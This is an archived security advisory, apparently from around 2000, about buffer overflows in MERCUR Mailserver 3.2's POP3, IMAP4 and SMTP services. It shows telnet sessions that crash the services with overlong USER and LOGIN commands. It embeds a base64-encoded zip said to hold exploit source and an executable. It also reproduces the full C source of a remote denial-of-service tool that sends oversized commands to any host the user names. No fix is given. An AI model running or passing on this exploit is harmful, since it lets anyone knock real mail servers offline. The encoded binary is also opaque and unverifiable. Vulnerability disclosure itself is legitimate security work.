COMMAND
Mercur Mailserver
SYSTEMS AFFECTED
- MERCUR Mailserver 3.2
- MERCUR POP3-Server (v3.20.01) for Windows 98/NT
- MERCUR IMAP4-Server (v3.20.01) for Windows 98/NT
PROBLEM
UssrLabs found multiple places in MERCUR v3.20.* where they do not
use proper bounds checking. The following all result in a Denial
of Service against the service in question. Example:
[hellme@die-communitech.net$ telnet example.com 110
Trying example.com...
Connected to example.com.
Escape character is '^]'.
+OK MERCUR POP3-Server (v3.20.01 Unregistered) for Windows NT ready
at Tue, 14 M
ar 2000 03:30:39 -0300
user (buffer)
Where [buffer] is aprox. 2000 characters.
[hellme@die-communitech.net$ telnet example.com 143
Trying example.com...
Connected to example.com.
Escape character is '^]'.
* OK MERCUR IMAP4-Server (v3.20.01 Unregistered) for Windows NT ready
at Tue, 14
Mar 2000 03:34:09 -0300
(buffer)
Where [buffer] is aprox. 3000 characters.
Binary or source for this Exploit:
http://www.ussrback.com/
The exploit crashes the remote machine service pop3 and imap.
Below is a mimed source:
---
Content-Type: application/octet-stream; name="merc32ds.zip"
Content-Transfer-Encoding: base64
Content-Disposition: inline; filename="merc32ds.zip"
Content-MD5: 4P1Ma3Eq6CMMTpE5wFEn8Q==
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
QgEAAAAUAAAAAA==
-----
I don't know if this is the same, but it sounds like same problem
(posted by "|[TDP]|").
/*
* Remote Denial of Service for Mercur 3.2
*
* (C) |[TDP]| - HaCk-13 TeaM - 2000 <tdp@psynet.net>
*
*
* This code shows a Mercur 3.2 vulnerability in which, any remote
* user can cause server shutdown. Previous Mercur versions may be
* affected by this vulnerability.
*
* Greetings to all the other members and all my friends :)
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netdb.h>
#include <netinet/in.h>
#include <arpa/inet.h>
void
usage (char *progname)
{
fprintf (stderr, "Usage: %s <hostname> [type]\n", progname);
fprintf (stderr, " Type:\n");
fprintf (stderr, " 0 - IMAP4 (Default)\n");
fprintf (stderr, " 1 - POP3\n");
fprintf (stderr, " 2 - SMTP\n\n");
exit (1);
}
int
main (int argc, char **argv)
{
char *ptr, buffer[3000], remotedos[3100];
int aux, sock, type;
struct sockaddr_in sin;
unsigned long ip;
struct hostent *he;
fprintf (stderr,
"\n-= Remote DoS for Mercur 3.2 - (C) |[TDP]| - H13 Team =-\n");
if (argc < 2)
usage (argv[0]);
type = 0;
if (argc > 2)
type = atol (argv[2]);
ptr = buffer;
switch (type)
{
case 1:
memset (ptr, 0, 2048);
memset (ptr, 88, 2046);
break;
default:
memset (ptr, 0, sizeof (buffer));
memset (ptr, 88, sizeof (buffer) - 2);
break;
}
bzero (remotedos, sizeof (remotedos));
switch (type)
{
case 1:
snprintf (remotedos, sizeof (remotedos), "USER %s\r\n\r\n\r\n", buffer);
break;
case 2:
snprintf (remotedos, sizeof (remotedos),
"MAIL FROM: %s@ThiSiSaDoS.c0m\r\n\r\n\r\n", buffer);
break;
default:
snprintf (remotedos, sizeof (remotedos), "1000 LOGIN %s\r\n\r\n\r\n", buffer);
break;
}
if ((sock = socket (AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0)
{
perror ("socket()");
return -1;
}
if ((he = gethostbyname (argv[1])) != NULL)
{
ip = *(unsigned long *) he->h_addr;
}
else
{
if ((ip = inet_addr (argv[1])) == NULL)
{
perror ("inet_addr()");
return -1;
}
}
sin.sin_family = AF_INET;
sin.sin_addr.s_addr = ip;
switch (type)
{
case 1:
sin.sin_port = htons (110);
break;
case 2:
sin.sin_port = htons (25);
break;
default:
sin.sin_port = htons (143);
break;
}
if (connect (sock, (struct sockaddr *) &sin, sizeof (sin)) < 0)
{
perror ("connect()");
return -1;
}
switch (type)
{
case 1:
fprintf (stderr, "\nEngaged Mercur POP3... Sending data...\n");
break;
case 2:
fprintf (stderr, "\nEngaged Mercur SMTP... Sending data...\n");
break;
default:
fprintf (stderr, "\nEngaged Mercur IMAP4... Sending data...\n");
break;
}
if (write (sock, remotedos, strlen (remotedos)) < strlen (remotedos))
{
perror ("write()");
return -1;
}
sleep (4);
fprintf (stderr, "Bye Bye baby!...\n\n");
if (close (sock) < 0)
{
perror ("close()");
return -1;
}
return (0);
}
SOLUTION
Nothing yet.